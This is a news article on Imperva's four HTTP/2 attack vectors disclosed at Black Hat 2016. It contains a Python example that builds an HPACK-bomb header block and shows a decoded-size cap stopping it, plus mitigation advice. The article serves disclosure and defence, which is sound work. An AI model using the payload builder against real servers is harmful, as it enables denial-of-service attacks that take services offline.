Researchers Discover Major HTTP/2 Flaws

The future building block of the World Wide Web, HTTP/2, has four high-profile flaws, researchers at Imperva warned at this year’s Black Hat 2016 conference.

The HTTP/2 standard was finalised back in February 2015 with the aim of making web connections quicker and more secure, but the flaws discovered could allow attackers to crash servers, and they raise concern as adoption of the HTTP/2 standard gathers steam.

Underlying Flaws

HTTP/2 is a major update to the Hypertext Transfer Protocol (HTTP), which is the foundation of data communication for the World Wide Web.

The most widely used version of the standard, HTTP/1.1, was actually defined back in 1999, but according to W3Techs 8.7 percent of all websites (roughly 85 million sites) now use HTTP/2.

This represents an almost fourfold increase from just 2.3 percent in December 2015.

Imperva Defense Center researchers warned that HTTP/2 introduces new mechanisms that effectively increase the attack surface of business-critical web infrastructure, exposing it to new types of attack.

They examined HTTP/2 server implementations from Apache, Microsoft, NGINX, Jetty, and nghttp2, and discovered “exploitable vulnerabilities in all major HTTP/2 mechanisms” they reviewed.


This included two “that are similar to well-known and widely exploited vulnerabilities in HTTP/1.x,” said the researchers. “It is likely that other implementations of the HTTP/2 protocol also suffer from these vulnerabilities.”

“The general web performance improvements and specific enhancements for mobile applications introduced in HTTP/2 are a potential boon for internet users,” said Amichai Shulman, co-founder and CTO of Imperva. “However, releasing a large amount of new code into the wild in a short time creates an excellent opportunity for attackers.

“While it is disturbing to see known HTTP 1.x threats introduced in HTTP/2, it’s hardly surprising. As with all new technology, it is important for businesses to perform due diligence and implement safeguards to harden the extended attack surface and protect critical business and consumer data from ever-evolving cyber threats.”

Attack Vectors

Imperva researchers detailed the four high-profile attack vectors they found. First was a “slow read” attack, in which a malicious client reads responses very slowly, in HTTP/2 by advertising a tiny flow-control window so that the server must keep each stream and its buffered response open. The researchers likened it to the well-known Slowloris DDoS attack experienced by major credit card processors in 2010.

The second attack vector was the “HPACK Bomb”, a compression-layer attack that the researchers said resembles a zip bomb. HPACK, the header compression scheme used by HTTP/2, lets a sender store a header in the receiver’s dynamic table once and then refer to it by a one-byte index, so an attacker can plant a header value that nearly fills the table and reference it thousands of times, with each reference decoding to the full value. “The attacker crafts small and seemingly innocent messages that turn into gigabytes of data on the server. This consumes all the server memory resources and effectively makes it unavailable,” the researchers warned.
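To make the expansion concrete, here is an added Python example (constructed for this article; it is not Imperva’s code and not any server’s decoder). It implements just the two HPACK representations the bomb relies on, a literal header field with incremental indexing and an indexed header field, without Huffman coding or table-size updates, and with the static table abbreviated to two entries. It builds a header block of roughly 14 KB that decodes to about 40 MB of header data, then shows the same block being rejected by a cap on the decoded header-list size, the idea behind the SETTINGS_MAX_HEADER_LIST_SIZE setting in RFC 7540. The value size, reference count and 16 KiB cap are assumptions chosen for illustration.

```python
"""Minimal HPACK (RFC 7541) decoder subset illustrating the "HPACK bomb".

Constructed example; not Imperva's code and not any server's decoder. Only the
literal-with-incremental-indexing and indexed-field representations are
implemented (no Huffman coding, no dynamic-table-size updates), and the static
table is abbreviated to the entries used here.
"""

STATIC_TABLE_LEN = 61                       # RFC 7541 Appendix A defines 61 entries
STATIC_TABLE = {1: (b":authority", b""), 2: (b":method", b"GET")}   # abbreviated
DEFAULT_DYNAMIC_TABLE_SIZE = 4096           # SETTINGS_HEADER_TABLE_SIZE default


class HeaderListTooLarge(Exception):
    """Decoded header list exceeded the configured limit."""


def _encode_int(value, prefix_bits, flags=0):
    """HPACK integer encoding (RFC 7541 section 5.1); flags fill the high bits."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([flags | value])
    out = bytearray([flags | limit])
    value -= limit
    while value >= 128:
        out.append((value % 128) | 0x80)
        value //= 128
    out.append(value)
    return bytes(out)


def _decode_int(buf, pos, prefix_bits):
    """Inverse of _encode_int; returns (value, next_pos)."""
    limit = (1 << prefix_bits) - 1
    value = buf[pos] & limit
    pos += 1
    if value < limit:
        return value, pos
    shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos


def _encode_string(data):
    return _encode_int(len(data), 7) + data      # H bit clear: raw octets


def _decode_string(buf, pos):
    if buf[pos] & 0x80:
        raise NotImplementedError("Huffman-coded strings not handled here")
    length, pos = _decode_int(buf, pos, 7)
    return bytes(buf[pos:pos + length]), pos + length


def build_hpack_bomb(value_size=4000, references=10000):
    """One literal that lands in the dynamic table, then many one-byte references to it."""
    block = bytearray(b"\x40")                   # literal w/ incremental indexing, name index 0
    block += _encode_string(b"x") + _encode_string(b"a" * value_size)
    # The new entry is dynamic index 62 (STATIC_TABLE_LEN + 1); 0x80 marks an indexed field.
    block += _encode_int(STATIC_TABLE_LEN + 1, 7, 0x80) * references
    return bytes(block)


def decode_header_block(block, max_header_list_size=None):
    """Decode a header block; enforce an optional cap on the decoded list size."""
    dynamic, dyn_size = [], 0                    # most recent entry first
    headers, decoded_size, pos = [], 0, 0
    while pos < len(block):
        first = block[pos]
        if first & 0x80:                         # indexed header field
            index, pos = _decode_int(block, pos, 7)
            if index == 0:
                raise ValueError("index 0 is not allowed in an indexed field")
            if index <= STATIC_TABLE_LEN:
                name, value = STATIC_TABLE[index]   # KeyError: abbreviated table
            else:
                name, value = dynamic[index - STATIC_TABLE_LEN - 1]
        elif first & 0xC0 == 0x40:               # literal with incremental indexing
            index, pos = _decode_int(block, pos, 6)
            if index == 0:
                name, pos = _decode_string(block, pos)
            elif index <= STATIC_TABLE_LEN:
                name = STATIC_TABLE[index][0]
            else:
                name = dynamic[index - STATIC_TABLE_LEN - 1][0]
            value, pos = _decode_string(block, pos)
            dynamic.insert(0, (name, value))
            dyn_size += len(name) + len(value) + 32     # RFC 7541 section 4.1 entry size
            while dyn_size > DEFAULT_DYNAMIC_TABLE_SIZE:  # evict oldest entries
                n, v = dynamic.pop()
                dyn_size -= len(n) + len(v) + 32
        else:
            raise NotImplementedError("other representations not handled here")
        # Same accounting SETTINGS_MAX_HEADER_LIST_SIZE uses (RFC 7540 section 6.5.2).
        decoded_size += len(name) + len(value) + 32
        if max_header_list_size is not None and decoded_size > max_header_list_size:
            raise HeaderListTooLarge(f"{decoded_size} bytes decoded, limit {max_header_list_size}")
        headers.append((name, value))
    return headers


def decoded_bytes(block, max_header_list_size=None):
    """Return total name+value bytes produced, or -1 if the cap stopped decoding."""
    try:
        hdrs = decode_header_block(block, max_header_list_size)
    except HeaderListTooLarge:
        return -1
    return sum(len(n) + len(v) for n, v in hdrs)


if __name__ == "__main__":
    bomb = build_hpack_bomb()
    print(f"header block: {len(bomb)} bytes -> {decoded_bytes(bomb)} bytes decoded (uncapped)")
    print(f"with a 16 KiB header-list cap: {decoded_bytes(bomb, 16384)}")
```

The point of the cap is that it is applied to the decoded size as each field is produced, not to the compressed block, so the decoder stops after a handful of references instead of materialising the whole list. A real server also has to send its limit to the peer in a SETTINGS frame and treat a block that exceeds it as a connection or stream error.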

The third attack vector was a “Dependency Cycle Attack”, which abuses the stream priority and dependency mechanism HTTP/2 introduced for network optimisation: crafted priority information makes the server’s stream dependency tree contain a cycle, which an implementation that walks the tree must detect and break. The fourth and final attack vector was “Stream Multiplexing Abuse”, in which the attacker exploits flaws in the way servers implement stream multiplexing to crash the server.

Imperva warned firms to be aware of the security risks of adopting new technology and said businesses should deploy a web application firewall (WAF) with virtual patching capabilities to help protect against such attacks. A WAF is a stop-gap, however: the more direct fixes are applying the vendors’ patched server builds and using the limits the protocol itself provides, such as the maximum number of concurrent streams and the maximum decoded header-list size that a server advertises in its SETTINGS frame.


Tom Jowitt

Tom Jowitt is a leading British tech freelancer and long standing contributor to Silicon UK. He is also a bit of a Lord of the Rings nut...
